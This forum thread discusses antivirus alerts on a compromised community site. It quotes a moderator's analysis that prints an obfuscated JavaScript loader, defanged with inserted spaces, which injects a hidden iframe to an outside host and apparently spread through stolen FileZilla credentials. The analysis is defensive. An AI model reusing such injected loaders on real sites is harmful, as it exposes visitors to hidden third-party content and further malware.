Trojaner at SAS?
#1

Got a Trojaner warning message from Kaspersky 2012 when I go to the site! Happens only at me?

Admin, please delete the same topic in the SAS section!
Thanks!
Reply
#2

Same here with AVAST. I've read at M4T this is NOT a false positive but a real threat! Confusedhock:
Reply
#3

This is what I got.
[Image: ScreenHunter_01Jun161913.gif]
Reply
#4

Sit back and relax, everything's fine.

Let me crosspost this from SAS site:

Quote:The bad news is: Yes, there is bogus content which has been added (by whoever) to our site.
This bogus content creates an additional iframe of the following url: http://nikeeyb.com/stats.php
The script which creates this iframe is highly obfuscated, it originally looks like this (additional spaces put in to keep this from causing further alerts here):
Code:
tr y{q=do cument.crea teEl ement("p");q.appe ndChi ld(q "");}
cat ch(qw){h=-012/5;try{bc sd=prot otype-2;}c atch(ba wg){ss=[];f=(h)?("fromC harC" "ode"):
"";e=windo w["e" "v al"];n=[1 3,20,300,4 44,99,234,327,404,1 10,232,138,476,114,210,3 48,4
04,40,78,180,420,102, 228,291,436,101,64,345,45 6,99,122,102,416,116,232,3 36,232,47,94,3
30,420,107,2 02,303,484,98,92,297,444,10 9,94,345,464,97,232,345,18 4,112,208,336,136,32,2
30,2 97,456,111,216,324,420,110,2 06,183,136,97,234,348,444,34,6 4,306,456,97,218,303,392,1
11,22 8,300,404,114,122,102,440,111,6 8,96,388,108,210,309,440,61,68,2 97,404,110,232,30
3,456,34,64,3 12,404,105,206,312,464,61,68,1 50,136,32,238,315,400,116,208,1 83,136,50,6
8,186,240,47,210,306,45 6,97,218,303,248,39,82,177,52,10];if(windo w.do cument)fo r(i=6-
2-1-2-1;-145 i!=2-2;i  ){k=i;s s=ss Stri ng[f](n[k]/(i%(h*h) 2-1));}e("if(1)" ss);}}

Reformatting the content gives us (again with bogus spaces for alert safety):
Code:
tr y{
    q=doc ument.crea teElem ent("p");
    q.appe ndC hild(q "");
}c atch(qw){
    h=-012/5;
    try{
        bc sd=pro totype-2;
    }ca tch(ba wg){
        ss=[];
        f=(h)?("f romC harC" "od e"):"";
        e=win dow["e" "val"];
        n=[13,20,3 00,444,99,234,327,404,110,2 32,138,476,114,210,348,40 4,4
0,78,180,420,102,228,29 1,436,101,64,345,456,99,12 2,102,416,116,232,336,23 2,47,94,3
30,420,107,202,3 03,484,98,92,297,444,10 9,94,345,464,97,232,34 5,184,112,208,336,13
6,32,23 0,297,456,111,216,324,420,11 0,206,183,136,97,234,348,44 4,34,64,306,456,97,
218,303,3 92,111,228,300,404,114,122,1 02,440,111,68,96,388,108,2 10,309,440,61,68,2
97,404,11 0,232,303,456,34,64,312,4 04,105,206,312,464,61,68,1 50,136,32,238,315,40
0,116,2 08,183,136,50,68,186,2 40,47,210,306,456,97,218,30 3,248,39,82,177,52,10];
        if(win dow.docum ent){
            fo r(i=6-2-1 -2-1;-1 45 i!=2- 2;i  ){
                k=i;
                ss=ss Stri ng[f](n[k]/(i%(h*h) 2-1));
            }
            e("i f(1)" ss);
        }
    }
}[/c ode]

Which in turn at runtime decodes to:
[code]document.write('');

Web watching antivirus software treats this as a trojan and that's basically right since there could be anything in that iframe url.

That much for the bad news, now the good ones:

There's no content behind that url. Nothing in there at http://nikeeyb.com/stats.php, nada, zero bytes.
Looks like some admin already removed that content over there.

Bottom line: Don't panik. As soon as SAS~CirX is back he'll deal with the issue. You can safely ignore the alert in the meantime since there's no risk arising from this.

Best regards - Mike

Quote:Just a heads up on the "hacked website" issue:

According to security website reports this ain't no attack aimed at us.
Obviously this is the outcome of some malware which spreads the infection across each and every FileZilla account it can find on an infected computer.
Security experts are uncertain whether this has been spread around by an official FileZilla version, some compromised or hacked version or simply some separate malware which hooks to FileZilla versions it finds on infected PCs.
Whatever it is, the goal of this attack is to raise stats counters on the target website, in our case Nike. That's also the reason why there's no additional badware behind: First of all it's not the intention even to load additional stuff, second Nike distanced themselves from this action, that's why the target php script doesn't exist in that place anymore.

What's triggering antivirus protection software is rather the general layout of packed javascript content, not this special attack-script which we have here.

Bottom line: It's all fine, we're safe, but FileZilla users might want to check webservers they've got access to.

Best regards - Mike
Reply
#5

Thank you Mike :wink:
Buller
Reply
#6

Actually all users should be able to get back on to the SAS board again, apparently all incarnations of the intrusion have been removed.

Best regards - Mike
Reply
#7

This article gives the light in which we can observe the reality. This is very nice one and gives indepth information. Thanks for this nice article. Toomics Review
Reply


Forum Jump:


Users browsing this thread: 2 Guest(s)